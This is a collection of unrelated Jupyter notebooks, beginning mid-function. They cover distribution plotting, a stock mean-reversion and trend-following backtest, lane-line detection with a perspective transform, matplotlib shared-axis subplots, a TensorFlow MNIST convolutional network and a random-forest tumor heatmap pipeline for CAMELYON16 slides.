    handles.append(plt.axvline(x=mean, color='y', label='Mean: {0:.2f}'.format(mean)))
    handles.append(plt.axvline(x=median, color='g', label='Median: {0:.2f}'.format(median)))
    plt.legend(handles=handles)
    plt.title(title, {'fontsize': 20})
    plt.show()

modal = np.random.normal(10, 3, 5000)
graph(modal, 40, 'Normal Distribution')
modal = np.random.exponential(2, 5000)
graph(modal, 40, 'Exponential Distribution')
modal1 = np.random.normal(10, 3, 2500)
modal2 = np.random.normal(20, 3, 2500)
modal = np.concatenate((modal1, modal2))
graph(modal, 40, 'Bi-Modal Distribution')
modal = np.random.lognormal(10, 0.7, 5000)
graph(modal, 40, 'Log Normal Distribution')
###Output
_____no_output_____
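###Markdown
A quick sanity check (a sketch reusing the `HRM` definition above; note that `HRM` expects a sorted array, which `graph` handles via `modal.sort()`): for a symmetric unimodal sample, the half-range estimate should land near the true mode.
###Code
check = np.random.normal(10, 3, 5001)  # true mode is 10
check.sort()                           # HRM assumes sorted input
print('HRM estimate:', HRM(check, len(check)))
print('sample mean :', check.mean())
###Output
_____no_output_____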
ipython/qa.ipynb
###Markdown
7. Quantitative Trading
###Code
data['close'].plot()
bors = data.loc['2016-07-01':]
k, b = calc.linear_regression_kb(bors['close'].values);
degree = np.rad2deg(k)

model, zoom_factor = calc.linear_regression_y(bors['close'].values, zoom=True)
k2 = model.params[1]
b2 = model.params[0]
degree2 = np.rad2deg(k2)

x = np.arange(0, bors['close'].shape[0])
reg_y_fit = x * k + b
reg_y_fit2 = x * k2 + b2

_, axes = plt.subplots(nrows=1, ncols=2, figsize=(20, 5))
axes[0].set_title(f"No zoom. degree={degree}")
axes[0].plot(x, bors['close'].values, '')
axes[0].plot(x, reg_y_fit, 'r')
axes[1].set_title(f"with zoom, degree={degree2}")
axes[1].plot(x, bors['close'].values, '')
axes[1].plot(x, reg_y_fit2/zoom_factor, 'r')
###Output
_____no_output_____
###Markdown
7.1 Mean-reversion strategy
- The train dataset is the data from the second-to-last year.
- The test dataset is the data from the last year.
###Code
Y1=-252
train = data.iloc[Y1*2:Y1];train.head()
train.shape
test = data.iloc[Y1:];test.head()
test.shape
close_mean = train.close.mean()
close_std = train.close.std()
sell_signal = close_mean + close_std / 3
buy_signal = close_mean - close_std /3
plt.figure(figsize=(20,7))
plt.title(f"Train dataset: close_mean={close_mean}, close_std={close_std}")
train.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'], loc='best')
plt.figure(figsize=(20,7))
plt.title(f"Test dataset: close_mean={close_mean}, close_std={close_std}")
test.close.plot()
plt.axhline(buy_signal, color='r', lw=3)
plt.axhline(close_mean, color='black', lw=1)
plt.axhline(sell_signal, color='g', lw=3)
plt.legend(['train close', f'buy signal({buy_signal})', f'close mean({close_mean})', f'sell signal({sell_signal})'], loc='best')
test.loc[test['close'] <= buy_signal, 'signal'] = 1
test.loc[test['close'] >= sell_signal,'signal'] = 0
test['keep'] = test['signal']
test['keep'].fillna(method='ffill', inplace=True)
#test.loc['2017-03-01':'2017-05-01']
###Output
/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:1: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  """Entry point for launching an IPython kernel.
/opt/conda/lib/python3.6/site-packages/pandas/core/generic.py:3191: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame
See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  self._update_inplace(new_data)
###Markdown > benchmark_profit2 is included to verify that benchmark_profit is correct.
> We can use ***np.log(close / close.shift(1))*** to calculate the (log) profit
###Code
test['benchmark_profit'] = np.log(test['close'] / test['close'].shift(1))
test['benchmark_profit2'] = (test['close'] - test['close'].shift(1)) / test['close'].shift(1)
test[['benchmark_profit','benchmark_profit2']].plot(subplots=True, grid=True, figsize=(14,7))
test.head()
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test['trend_profit'].plot(figsize=(20, 7))
#test.loc['2017-03-01':'2017-05-01']
test[['benchmark_profit', 'trend_profit']].cumsum().plot(grid=True, figsize=(20, 7))
###Output _____no_output_____
###Markdown > ***np.exp*** makes the result easier to read as a return on investment (about 1.2x here) rather than as a cumulative (log) growth rate
###Code
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
###Output _____no_output_____
###Markdown 2. Trend Following Strategy
N1: the highest price within the past N1 days gives the buy signal.
N2: the lowest price within the past N2 days gives the sell signal.
N1 > N2
###Code
N1 = 42
N2 = 21
test = data.loc['2016-06-01':]; test.head()
test['n1_high'] = test['high'].rolling(N1).max()
test['n2_low'] = test['low'].rolling(N2).min()
expan_max = test['close'].expanding().max()
expan_min = test['low'].expanding().min()
test['n1_high'].fillna(value=expan_max, inplace=True)
test['n2_low'].fillna(value=expan_min, inplace=True)
test.head()
test.loc[test['close'] > test['n1_high'].shift(1), 'signal'] = 1
test.loc[test['close'] < test['n2_low'].shift(1), 'signal'] = 0
test.head()
test['keep'] = test['signal'].shift(1)
test['keep'].fillna(method='ffill', inplace=True)
test['benchmark_profit'] = np.log(test['close']/test['close'].shift(1))
test['trend_profit'] = test['keep'] * test['benchmark_profit']
test[['benchmark_profit', 'trend_profit']].cumsum().apply(np.exp).plot(grid=True, figsize=(20, 7))
#test.loc['2016-10-15':'2016-11-15']
###Output _____no_output_____
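###Markdown A small numeric check of the log-return identity used above (an illustrative addition with made-up prices, not from the original cells): summed log returns exponentiate back to the simple total return, which is why ***cumsum().apply(np.exp)*** recovers the actual return on investment. ###Code
# Hedged example: exp(sum(log(c_t / c_{t-1}))) == c_N / c_0
c = np.array([10.0, 10.5, 10.2, 11.0, 12.3])
log_returns = np.log(c[1:] / c[:-1])
assert np.isclose(np.exp(log_returns.sum()), c[-1] / c[0])
###Output _____no_output_____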
examples/03-PerspectiveTransform.ipynb
###Markdown Advanced Lane Finding Project
The goals / steps of this project are the following:
* Compute the camera calibration matrix and distortion coefficients given a set of chessboard images.
* Apply a distortion correction to raw images.
* Use color transforms, gradients, etc., to create a thresholded binary image.
* **Apply a perspective transform to rectify binary image ("birds-eye view").**
* **Detect lane pixels and fit to find the lane boundary.**
* **Determine the curvature of the lane and vehicle position with respect to center.**
* **Warp the detected lane boundaries back onto the original image.**
* **Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.**
---
Apply a perspective transform to rectify binary image
###Code
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
import pickle
%matplotlib inline

ym_per_pix = 30 / 720
xm_per_pix = 3.7 / 700

parameters = pickle.load(open('./camera_calibration_parameters', 'rb'))
mtx, dist = map(parameters.get, ('mtx', 'dist'))

def region_lines(origin_img, vertices):
    img = origin_img.copy()
    for i in range(vertices.shape[1]-1):
        cv2.line(img, tuple(tuple(vertices[:, i])[0]), tuple(tuple(vertices[:, i+1])[0]), (0, 255, 0), 10)
    cv2.line(img, tuple(tuple(vertices[:, vertices.shape[1]-1])[0]), tuple(tuple(vertices[:, 0])[0]), (0, 255, 0), 10)
    return img

img = cv2.imread('../test_images/test3.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
undist = cv2.undistort(img, mtx, dist, None, mtx)
imshape = undist.shape
vertices = np.array([[(200, imshape[0]), (imshape[1]/2-40, imshape[0]*.6), (imshape[1]/2+40, imshape[0]*.6), (1200, imshape[0])]], dtype=np.float32)
img_with_region_lines = region_lines(img, vertices)
plt.imshow(img_with_region_lines)
plt.imshow(img)
gray = cv2.cvtColor(undist, cv2.COLOR_BGR2GRAY)
src = vertices
X, Y = imshape[1], imshape[0]
offset = 200
dst = np.float32([ (offset, Y), (offset, 0), (X-offset, 0), (X-offset, Y) ])
print(src)
print(dst)

def bird_eye(img, src, dst):
    # src/dst are the source and destination points of the perspective transform
    h, w = img.shape[:2]
    M = cv2.getPerspectiveTransform(src, dst)
    Minv = cv2.getPerspectiveTransform(dst, src)
    warped = cv2.warpPerspective(img, M, (w, h), flags=cv2.INTER_LINEAR)
    return warped, M, Minv

binary_warped, M, Minv = bird_eye(undist, src, dst)
#plt.imshow(binary_warped)
cv2.line(binary_warped, (200, 720), (200, 0), (0, 255, 0), 10)
cv2.line(binary_warped, (1080, 720), (1080, 0), (0, 255, 0), 10)
plt.imshow(binary_warped, cmap='gray')
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 10))
ax1.imshow(img_with_region_lines)
ax1.set_title('Undistorted Image with source points drawn')
ax2.imshow(binary_warped, cmap='gray')
ax2.set_title('Warped result with destination points drawn')
plt.savefig('warped_binary.jpg')
###Output _____no_output_____
###Markdown Detect lane pixels
###Code
def find_lane_pixels(binary_warped):
    histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0)
    out_img = np.dstack((binary_warped, binary_warped, binary_warped))
    midpoint = np.int(histogram.shape[0]//2)
    leftx_base = np.argmax(histogram[:midpoint])
    rightx_base = np.argmax(histogram[midpoint:]) + midpoint
    nwindows = 9
    margin = 100
    minpix = 50
    window_height = np.int(binary_warped.shape[0]//nwindows)
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    leftx_current = leftx_base
    rightx_current = rightx_base
    left_lane_inds = []
    right_lane_inds = []
    for window in range(nwindows):
        win_y_low = binary_warped.shape[0] - (window + 1)*window_height
        win_y_high = binary_warped.shape[0] - window*window_height
        win_xleft_low = leftx_current - margin
        win_xleft_high = leftx_current + margin
        win_xright_low = rightx_current - margin
        win_xright_high = rightx_current + margin
        cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2)
        cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2)
        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
        left_lane_inds.append(good_left_inds)
        right_lane_inds.append(good_right_inds)
        if len(good_left_inds) > minpix:
            leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
        if len(good_right_inds) > minpix:
            rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
    try:
        left_lane_inds = np.concatenate(left_lane_inds)
        right_lane_inds = np.concatenate(right_lane_inds)
    except ValueError:
        pass
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    return leftx, lefty, rightx, righty, out_img

def fit_polynomial(binary_warped):
    leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped)
    left_fit = np.polyfit(lefty, leftx, 2)
    right_fit = np.polyfit(righty, rightx, 2)
    ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])
    try:
        left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
        right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
    except TypeError:
        print('The function failed to fit a line!')
        left_fitx = 1 * ploty ** 2 + 1 * ploty
        right_fitx = 1 * ploty ** 2 + 1 * ploty
    out_img[lefty, leftx] = [255, 0, 0]
    out_img[righty, rightx] = [0, 0, 255]
    plt.plot(left_fitx, ploty, color='yellow')
    plt.plot(right_fitx, ploty, color='yellow')
    # Fit a second order polynomial to each
    left_fit_m = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2)
    right_fit_m = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2)
    return out_img, left_fit, right_fit, left_fit_m, right_fit_m, ploty

def space_thresh(img, thresh_min, thresh_max):
    binary = np.zeros_like(img)
    binary[(img >= thresh_min) & (img <= thresh_max)] = 1
    return binary

def abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255):
    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0)
    sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1)
    abs_sobelx = np.absolute(sobelx)
    abs_sobely = np.absolute(sobely)
    scaled_sobel = 0
    if orient == 'x':
        scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
    elif orient == 'y':
        scaled_sobel = np.uint8(255*abs_sobely/np.max(abs_sobely))
    sxbinary = np.zeros_like(scaled_sobel)
    sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1
    binary_output = np.copy(sxbinary)
    return binary_output

sobelx_img = abs_sobel_thresh(binary_warped, 'x', 10, 100)
plt.imshow(sobelx_img, cmap='gray')
hls_image = cv2.cvtColor(binary_warped, cv2.COLOR_BGR2HLS)
s_binary = space_thresh(hls_image[:, :, 2], 80, 255)
#plt.imshow(s_binary, cmap='gray')
out_img, left_fit, right_fit, left_fit_m, right_fit_m, proty = fit_polynomial(sobelx_img)
plt.imshow(out_img)
###Output _____no_output_____
###Markdown Determine the curvature of the lane and vehicle position with respect to center.
###Code
def calc_curve(ym, left_fit_cr, right_fit_cr, ploty):
    # Calculation of R_curve (radius of curvature)
    ym_per_pix = 30/ym
    y_eval = np.max(ploty)
    left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])
    right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])
    return left_curverad / 1000, right_curverad / 1000

print(calc_curve(719, left_fit_m, right_fit_m, proty))
###Output _____no_output_____
###Markdown Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position.
###Code
def draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, plot):
    y_max = img.shape[0]
    ploty = np.linspace(0, y_max - 1, y_max)
    color_warp = np.zeros_like(img).astype(np.uint8)
    left_fitx = left_fit[0] * ploty ** 2 + left_fit[1]*ploty + left_fit[2]
    right_fitx = right_fit[0] * ploty ** 2 + right_fit[1]*ploty + right_fit[2]
    vehicle_center = img.shape[1] * xm_per_pix / 2
    #middle = left_fitx + (right_fitx - left_fitx)/2
    # evaluate the metric fits at the bottom of the image; the parentheses
    # around (y_max * ym_per_pix) matter, since y must be converted to meters
    # before it is squared
    line_left = left_fit_m[0] * (y_max * ym_per_pix) ** 2 + left_fit_m[1] * y_max * ym_per_pix + left_fit_m[2]
    line_right = right_fit_m[0] * (y_max * ym_per_pix) ** 2 + right_fit_m[1] * y_max * ym_per_pix + right_fit_m[2]
    middle = (line_right + line_left)/2
    dist_from_center = middle - vehicle_center
    if dist_from_center > 0:
        message = '{:.2f} m right of center'.format(dist_from_center)
    else:
        message = '{:.2f} m left of center'.format(-1*dist_from_center)
    left, right = calc_curve(719, left_fit_m, right_fit_m, plot)
    # Recast the x and y points into usable format for cv2.fillPoly()
    pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
    pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
    pts = np.hstack((pts_left, pts_right))
    # Draw the lane onto the warped blank image
    cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
    # Warp the blank back to original image space using inverse perspective matrix (Minv)
    newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
    font = cv2.FONT_HERSHEY_SIMPLEX
    fontColor = (255, 255, 255)
    cv2.putText(img, 'Left curvature: {:.2f} km'.format(left), (50, 50), font, 2, fontColor, 2)
    cv2.putText(img, 'Right curvature: {:.2f} km'.format(right), (50, 120), font, 2, fontColor, 2)
    cv2.putText(img, 'Vehicle is {} '.format(message), (50, 190), font, 2, fontColor, 2)
    return cv2.addWeighted(img, 1, newwarp, 0.3, 0)

output = draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, img.shape[0]*30/719)
plt.imshow(output)
###Output _____no_output_____
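###Markdown For reference (a summarizing note, not from the original cells): `calc_curve` above implements the standard radius-of-curvature formula for a second-order fit $x = Ay^2 + By + C$, evaluated at the bottom of the image with $y$ converted to meters: $$R = \frac{\left(1 + (2Ay + B)^2\right)^{3/2}}{\left|2A\right|}$$ The final division by 1000 simply reports the radius in kilometers.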
General/Subplots and Shared Axes.ipynb
###Markdown Subplots and Shared Axes ###Code
%matplotlib notebook
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

df = pd.read_csv('weather.csv')
df.head()
days = df[df['MONTH'].isin([1,7]) & (df['DAY'] == 1)].drop(columns='DAY')
days = days.pivot(columns='MONTH', index='TIME')
days.head()
fig, ax = plt.subplots(2, 2, sharey='row', sharex='col')
days['TEMP'].plot(subplots=True, ax=ax[0], legend=False)
days['PRESSURE'].plot(subplots=True, ax=ax[1], legend=False);
ax[0][0].set_ylabel("Temperature")
ax[0][0].set_title("January")
ax[0][1].set_title("July")
ax[1][0].set_ylabel("Pressure")
ax[1][0].set_xlabel("Time")
ax[1][1].set_xlabel("Time")
fig.tight_layout()
###Output _____no_output_____
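###Markdown The `sharey='row', sharex='col'` shorthand above can also be wired up by hand, one panel at a time (an illustrative sketch, not from the original cells), which makes explicit exactly which axes are linked. ###Code
# Sketch: build the same 2x2 grid manually, sharing y along rows and x down columns.
fig2 = plt.figure()
top_left = fig2.add_subplot(2, 2, 1)
top_right = fig2.add_subplot(2, 2, 2, sharey=top_left)
bottom_left = fig2.add_subplot(2, 2, 3, sharex=top_left)
bottom_right = fig2.add_subplot(2, 2, 4, sharex=top_right, sharey=bottom_left)
days['TEMP'].plot(subplots=True, ax=[top_left, top_right], legend=False)
days['PRESSURE'].plot(subplots=True, ax=[bottom_left, bottom_right], legend=False)
fig2.tight_layout()
###Output _____no_output_____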
Lectures/Lecture-10/TensorFlow-Examples/3_NeuralNetworks/convolutional_network.ipynb
###Markdown Convolutional Neural Network Example
Build a convolutional neural network with TensorFlow.
This example uses the TensorFlow layers API; see the 'convolutional_network_raw' example for a raw TensorFlow implementation with variables.
- Author: Aymeric Damien
- Project: https://github.com/aymericdamien/TensorFlow-Examples/

CNN Overview
![CNN](http://personal.ie.cuhk.edu.hk/~ccloy/project_target_code/images/fig3.png)

MNIST Dataset Overview
This example uses MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28).
![MNIST Dataset](http://neuralnetworksanddeeplearning.com/images/mnist_100_digits.png)
More info: http://yann.lecun.com/exdb/mnist/
###Code
from __future__ import division, print_function, absolute_import

# Import MNIST data
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=False)

import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np

# Training Parameters
learning_rate = 0.001
num_steps = 2000
batch_size = 128

# Network Parameters
num_input = 784 # MNIST data input (img shape: 28*28)
num_classes = 10 # MNIST total classes (0-9 digits)
dropout = 0.25 # Dropout, probability to drop a unit

# Create the neural network
def conv_net(x_dict, n_classes, dropout, reuse, is_training):
    # Define a scope for reusing the variables
    with tf.variable_scope('ConvNet', reuse=reuse):
        # TF Estimator input is a dict, in case of multiple inputs
        x = x_dict['images']
        # MNIST data input is a 1-D vector of 784 features (28*28 pixels)
        # Reshape to match picture format [Height x Width x Channel]
        # Tensor input becomes 4-D: [Batch Size, Height, Width, Channel]
        x = tf.reshape(x, shape=[-1, 28, 28, 1])
        # Convolution Layer with 32 filters and a kernel size of 5
        conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)
        # Max Pooling (down-sampling) with strides of 2 and kernel size of 2
        conv1 = tf.layers.max_pooling2d(conv1, 2, 2)
        # Convolution Layer with 64 filters and a kernel size of 3
        conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)
        # Max Pooling (down-sampling) with strides of 2 and kernel size of 2
        conv2 = tf.layers.max_pooling2d(conv2, 2, 2)
        # Flatten the data to a 1-D vector for the fully connected layer
        fc1 = tf.contrib.layers.flatten(conv2)
        # Fully connected layer (in tf contrib folder for now)
        fc1 = tf.layers.dense(fc1, 1024)
        # Apply Dropout (if is_training is False, dropout is not applied)
        fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)
        # Output layer, class prediction
        out = tf.layers.dense(fc1, n_classes)
    return out

# Define the model function (following TF Estimator Template)
def model_fn(features, labels, mode):
    # Build the neural network
    # Because Dropout has different behavior at training and prediction time, we
    # need to create 2 distinct computation graphs that still share the same weights.
    logits_train = conv_net(features, num_classes, dropout, reuse=False, is_training=True)
    logits_test = conv_net(features, num_classes, dropout, reuse=True, is_training=False)

    # Predictions
    pred_classes = tf.argmax(logits_test, axis=1)
    pred_probas = tf.nn.softmax(logits_test)

    # If prediction mode, early return
    if mode == tf.estimator.ModeKeys.PREDICT:
        return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)

    # Define loss and optimizer
    loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
        logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))
    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
    train_op = optimizer.minimize(loss_op, global_step=tf.train.get_global_step())

    # Evaluate the accuracy of the model
    acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)

    # TF Estimator requires model_fn to return an EstimatorSpec that specifies
    # the different ops for training, evaluating, ...
    estim_specs = tf.estimator.EstimatorSpec(
        mode=mode,
        predictions=pred_classes,
        loss=loss_op,
        train_op=train_op,
        eval_metric_ops={'accuracy': acc_op})
    return estim_specs

# Build the Estimator
model = tf.estimator.Estimator(model_fn)
# Define the input function for training
input_fn = tf.estimator.inputs.numpy_input_fn(
    x={'images': mnist.train.images}, y=mnist.train.labels,
    batch_size=batch_size, num_epochs=None, shuffle=True)
# Train the Model
model.train(input_fn, steps=num_steps)
# Evaluate the Model
# Define the input function for evaluating
input_fn = tf.estimator.inputs.numpy_input_fn(
    x={'images': mnist.test.images}, y=mnist.test.labels,
    batch_size=batch_size, shuffle=False)
# Use the Estimator 'evaluate' method
model.evaluate(input_fn)
# Predict single images
n_images = 4
# Get images from test set
test_images = mnist.test.images[:n_images]
# Prepare the input data
input_fn = tf.estimator.inputs.numpy_input_fn(
    x={'images': test_images}, shuffle=False)
# Use the model to predict the image classes
preds = list(model.predict(input_fn))
# Display
for i in range(n_images):
    plt.imshow(np.reshape(test_images[i], [28, 28]), cmap='gray')
    plt.show()
    print("Model prediction:", preds[i])
###Output INFO:tensorflow:Restoring parameters from /tmp/tmpdhd6F4/model.ckpt-2000
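###Markdown A note on the tensor shapes flowing through `conv_net` (a summarizing addition, assuming the default `padding='valid'` of `tf.layers.conv2d`): 28x28x1 input -> 5x5 conv, 32 filters -> 24x24x32 -> 2x2 max-pool -> 12x12x32 -> 3x3 conv, 64 filters -> 10x10x64 -> 2x2 max-pool -> 5x5x64 -> flatten -> 1600 features -> dense 1024 -> dense 10 logits.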
notebooks/RFSegmentation.ipynb
###Markdown Patch preparation and heatmap prediction ###Code
wsi = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/tumor/tumor_005.tif'
json_filepath = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/lesion_annotations_json/tumor_005.json'
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf/'
os.makedirs(savedir, exist_ok=True)
img_mask_dir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_img_and_mask/'
basename = path_leaf(wsi).replace('.tif', '')
#if basename != 'tumor_110':
#    continue
patchsize = 256
saveto = os.path.join(savedir, basename + '.joblib.pickle')
saveto_original = os.path.join(savedir, basename + '.original.joblib.pickle')
all_samples = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005.tsv')
if 'img_path' not in all_samples.columns:
    assert img_mask_dir is not None, 'Need to provide directory if img_path column is missing'
    tile_loc = all_samples.tile_loc.astype(str)
    tile_loc = tile_loc.str.replace(' ', '').str.replace(')', '').str.replace('(', '')
    all_samples[['row', 'col']] = tile_loc.str.split(',', expand=True)
    all_samples['img_path'] = img_mask_dir + '/' + all_samples[['uid', 'row', 'col']].apply(
        lambda x: '_'.join(x.values.tolist()), axis=1) + '.img.joblib.pickle'
    all_samples['mask_path'] = img_mask_dir + '/' + all_samples[['uid', 'row', 'col']].apply(
        lambda x: '_'.join(x.values.tolist()), axis=1) + '.mask.joblib.pickle'
if not os.path.isfile('/tmp/white.img.pickle'):
    white_img = np.ones([patchsize, patchsize, 3], dtype=np.uint8) * 255
    joblib.dump(white_img, '/tmp/white.img.pickle')
# Definitely not a tumor and hence all black
if not os.path.isfile('/tmp/white.mask.pickle'):
    white_img_mask = np.ones([patchsize, patchsize], dtype=np.uint8) * 0
    joblib.dump(white_img_mask, '/tmp/white.mask.pickle')
all_samples.loc[all_samples.is_tissue == False, 'img_path'] = '/tmp/white.img.pickle'
all_samples.loc[all_samples.is_tissue == False, 'mask_path'] = '/tmp/white.mask.pickle'
for idx, row in all_samples.iterrows():
    f = row['img_path']
    if not os.path.isfile(f):
        row['savedir'] = img_mask_dir
        row['patch_size'] = patchsize
        row['index'] = idx
        save_images_and_mask(row)
print(all_samples.head())
all_samples.to_csv('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask.tsv', index=False, header=True, sep='\t')
testing_init_op, testing_next_batch = input_fn(['/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask_segmented.tsv'], batch_size)
tumor005_segdf = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_segmented.fixed.segmented.tsv')
tumor005_segdf.head()
n_samples = len(tumor005_segdf.index)
n_samples
slide = WSIReader(wsi, 40)
n_cols = int(slide.dimensions[0] / patchsize)
n_rows = int(slide.dimensions[1] / patchsize)
assert n_rows * n_cols == n_samples, 'Grid dimensions do not match the number of patches'
print('Total: {}'.format(n_samples))
"""
def generate_rows(samples, num_samples, batch_size=32):
    while True: # Loop forever so the generator never terminates
        for offset in range(0, num_samples, batch_size):
            batch_samples = samples.iloc[offset:offset + batch_size]
            is_tissue = batch_samples.is_tissue.tolist()
            is_tumor = batch_samples.is_tumor.astype('int32').tolist()
            features = []
            batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
            for _, batch_sample in batch_samples.iterrows():
                row = batch_samples.values
                features.append(row)
            X_train = np.array(features)
            y_train = np.array(labels)
            yield X_train, y_train
"""

def generate_rows(samples, num_samples, batch_size=1):
    while True: # Loop forever so the generator never terminates
        for offset in range(0, num_samples, batch_size):
            batch_samples = samples.iloc[offset:offset + batch_size]
            #is_tissue = batch_samples.is_tissue.tolist()
            #is_tumor = batch_samples.is_tumor.astype('int32').tolist()
            features = []
            labels = []
            #batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor'])
            for _, batch_sample in batch_samples.iterrows():
                row = batch_sample.values
                label = int(batch_sample.is_tumor)
                if batch_sample.is_tissue:
                    feature = pd.read_table(os.path.join('/Z/personal-folders/interns/saket/github/pyvirchow', batch_sample.segmented_tsv))
                    feature = feature.drop(columns=['is_tumor', 'is_tissue'])
                    assert len(feature.columns) == 46
                    features.append(feature.loc[0].values)
                else:
                    values = [0.0]*46
                    features.append(values)
                labels.append(label)
            X_train = np.array(features, dtype=np.float32)
            y_train = np.array(labels)
            #print(X_train)
            #print(y_train)
            yield X_train, y_train

predicted_thumbnails = list()
batch_size = 1
"""
sess.run(testing_init_op)
while True:
    try:
        testing_features_batch, testing_label_batch = sess.run(testing_next_batch)
    except tf.errors.OutOfRangeError:
        break
    preds = sess.run(infer_op, feed_dict={X: testing_features_batch})
    predicted_thumbnails.append(preds)
"""
true_labels = []
for offset in tqdm_notebook(list(range(0, n_samples, batch_size))):
    batch_samples = tumor005_segdf.iloc[offset:offset + batch_size]
    X_test, true_label = next(generate_rows(batch_samples, batch_size))
    true_labels.append(true_label)
    if batch_samples.is_tissue.nunique() == 1 and batch_samples.iloc[0].is_tissue == False:
        # all patches in this row do not have tissue, skip them all
        #predicted_thumbnails.append(np.zeros(batch_size, dtype=np.float32))
        predicted_thumbnails.append(0)
    else:
        preds = sess.run(infer_op, feed_dict={X: X_test})
        predicted_thumbnails.append(preds[0][1])
predicted_thumbnails = np.asarray(predicted_thumbnails)
savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf'
saveto = os.path.join(savedir, 'tumor_005.job.pickle')
os.makedirs(savedir, exist_ok=True)
output_thumbnail_preds = predicted_thumbnails.reshape(n_rows, n_cols)
joblib.dump(output_thumbnail_preds, saveto)
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds, cmap='coolwarm')
plt.colorbar(x)
fig.tight_layout()
fig, ax = plt.subplots()
sns.set_style('white')
x = ax.imshow(output_thumbnail_preds > 0.5, cmap='gray')
#plt.colorbar(x)
fig.tight_layout()
saver = tf.train.Saver()
saver.save(sess, '/Z/personal-folders/interns/saket/github/pyvirchow/models/random_forest_all_train.tf.model')
df = pd.read_table('../data/patch_df/tumor_001_with_mask_segmented.segmented.tsv')
df1 = df[df.segmented_tsv==df.segmented_tsv]
df1.head()
